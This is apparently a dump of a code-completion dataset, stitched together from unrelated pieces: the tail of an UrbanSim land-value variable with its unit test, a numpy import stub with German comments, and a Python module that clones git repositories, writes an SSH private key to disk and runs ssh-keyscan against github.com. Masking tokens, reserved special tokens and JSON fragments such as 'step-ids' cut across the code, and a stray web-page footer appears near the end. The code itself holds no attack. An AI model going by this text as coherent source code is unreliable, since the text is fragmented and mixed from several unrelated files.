"step-5": "# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE\r\n\r\nfrom opus_core.variables.variable import Variable\r\nfrom variable_functions import my_attribute_label\r\n\r\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\r\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\r\n\r\n def __init__(self, group):\r\n self.group = group\r\n Variable.__init__(self)\r\n\r\n def dependencies(self):\r\n return [my_attribute_label(\"is_in_plan_type_group_%s\" % self.group), \r\n my_attribute_label(\"total_land_value\")]\r\n\r\n def compute(self, dataset_pool):\r\n return self.get_dataset().get_attribute(\"is_in_plan_type_group_%s\" % self.group) * \\\r\n self.get_dataset().get_attribute(\"total_land_value\")\r\n\r\n def post_check(self, values, dataset_pool):\r\n self.do_check(\"x >= 0\", values)\r\n\r\n\r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import array\r\nclass Tests(opus_unittest.OpusTestCase):\r\n def test_my_inputs(self):\r\n total_land_value = array([100, 200, 300])\r\n is_in_plan_type_group_residential = array([1, 0, 1])\r\n\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim'],\r\n test_data={\r\n \"gridcell\":{ \r\n \"grid_id\":array([1,2,3]),\r\n \"total_land_value\":total_land_value, \r\n \"is_in_plan_type_group_residential\":is_in_plan_type_group_residential\r\n }\r\n }\r\n )\r\n \r\n should_be = array([100, 0, 300])\r\n instance_name = \"urbansim.gridcell.total_land_value_if_in_plan_type_group_residential\"\r\n tester.test_is_equal_for_family_variable(self, should_be, instance_name)\r\n\r\n\r\nif __name__=='__main__':\r\n opus_unittest.main()",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy
import math
import operator
<|reserved_special_token_1|>
import numpy
#Matrixmultiplikation
#Matrixinvertierung
#nicht p inv
#selbst invertierbar machen
import math
import operator
|
flexible
|
{
"blob_id": "ece20c8c8fae2225cbac3552e254314b7116057c",
"index": 7095,
"step-1": "<mask token>\n",
"step-2": "import numpy\nimport math\nimport operator\n",
"step-3": "import numpy\n#Matrixmultiplikation\n#Matrixinvertierung\n#nicht p inv\n#selbst invertierbar machen\n\nimport math\nimport operator",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = Repo.clone_from(metadata, clone_path
) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
import logging
import subprocess
from pathlib import Path
from typing import Union
from git import Repo
def init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = Repo.clone_from(metadata, clone_path
) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
import logging
import subprocess
from pathlib import Path
from typing import Union
from git import Repo
def init_repo(metadata: str, path: str, deep_clone: bool) -> Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = (Repo.clone_from(metadata, clone_path)
if deep_clone else
Repo.clone_from(metadata, clone_path, depth=1))
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) -> None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(0o400)
scan = subprocess.run([
'ssh-keyscan', '-t', 'rsa', 'github.com'
], stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) -> bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [
x.a_path for x in repo.index.diff(None)]:
return True
return False
|
flexible
|
{
"blob_id": "cb2dd08a09d2e39bd83f82940c3d9a79a5a27918",
"index": 6523,
"step-1": "<mask token>\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-3": "<mask token>\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = Repo.clone_from(metadata, clone_path\n ) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-4": "import logging\nimport subprocess\nfrom pathlib import Path\nfrom typing import Union\nfrom git import Repo\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = Repo.clone_from(metadata, clone_path\n ) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-5": "import logging\nimport subprocess\nfrom pathlib import Path\nfrom typing import Union\nfrom git import Repo\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) -> Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = (Repo.clone_from(metadata, clone_path)\n if deep_clone else\n Repo.clone_from(metadata, clone_path, depth=1))\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) -> None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(0o400)\n scan = subprocess.run([\n 'ssh-keyscan', '-t', 'rsa', 'github.com'\n ], stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) -> bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [\n x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.